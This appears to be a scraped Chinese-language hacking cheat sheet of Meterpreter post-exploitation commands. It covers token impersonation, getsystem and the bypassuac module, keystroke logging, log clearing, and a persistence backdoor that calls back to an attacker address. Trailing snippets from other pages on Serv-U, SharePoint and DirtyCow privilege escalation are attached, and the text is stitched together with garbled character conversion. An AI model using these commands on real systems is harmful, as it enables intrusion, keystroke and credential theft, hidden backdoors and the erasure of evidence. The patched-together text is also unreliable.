meterpeter:
可以在 meterpreter 使用 incognito 來開始模擬過程:
use incognito
展示 incognito 的幫助文件,通過輸入 help 命令:
help
獲得可用使用者的列表
list_tokens –u
模擬攻擊
impersonate_token \willie-pc\willie
本地提權攻擊:
getsystem
如果你嘗試獲得 windows 7 主機的訪問,你必須在執行 getsystem 命令之前執
行 bypassuac 。 bypassuac 允許你繞過微軟的使用者賬戶控制。這個命令這樣運
行: run post/windows/escalate/bypassuac 。
收集受害者資料:
keyscan_start
keyscan_dump
也可以使用 wireshark 或
airodump-ng 來更簡單地收集資料。
清理蹤跡:
執行 irb,以便進行日誌移除操作。我們開啟幫助檔案:
irb現在我們執行命令來清理日誌檔案:
log.clear
建立永久後門:
現在,我們執行命令來建立後門:
run persistence –u –a –i 10 – 8090 –r 192.168.10.109
後門現在已經建立了。如果成功的話,你會注意到你有了第二個 meterpreter 會話。
Serv U FTP Server本地提公升許可權缺陷
serv u ftp server為rhinosoft出品的一款ftp server軟體,可執行在microsoft windows平台下。servuadmin.exe是ftp server管理介面,由於servuadmin.exe對異常的不正確處理,導致在serv u被 註冊為系統服務的情況下,本...
MOSS提公升許可權方法
1 sharepoint乙個有用的方法spsecurity.runwithelevatedprivileges delegate 今天開發的過程中用到在moss 上去訪問域控上的使用者資訊,這個我是利用ldap協議來實現的其中用的了乙個directoryentry這個類 這個類是引自system.d...
Linux許可權提公升 Kernel exploit
宣告 本文介紹的內容僅用於學習和研究目的,請勿用做非法用途。利用dirtycow漏洞提權 linux kernel 2.6.22 3.9 檢視當前使用者和核心版本資訊 whoami uname a gcc pthread dirty.c o dirty lcrypt切換到firefart使用者,可以...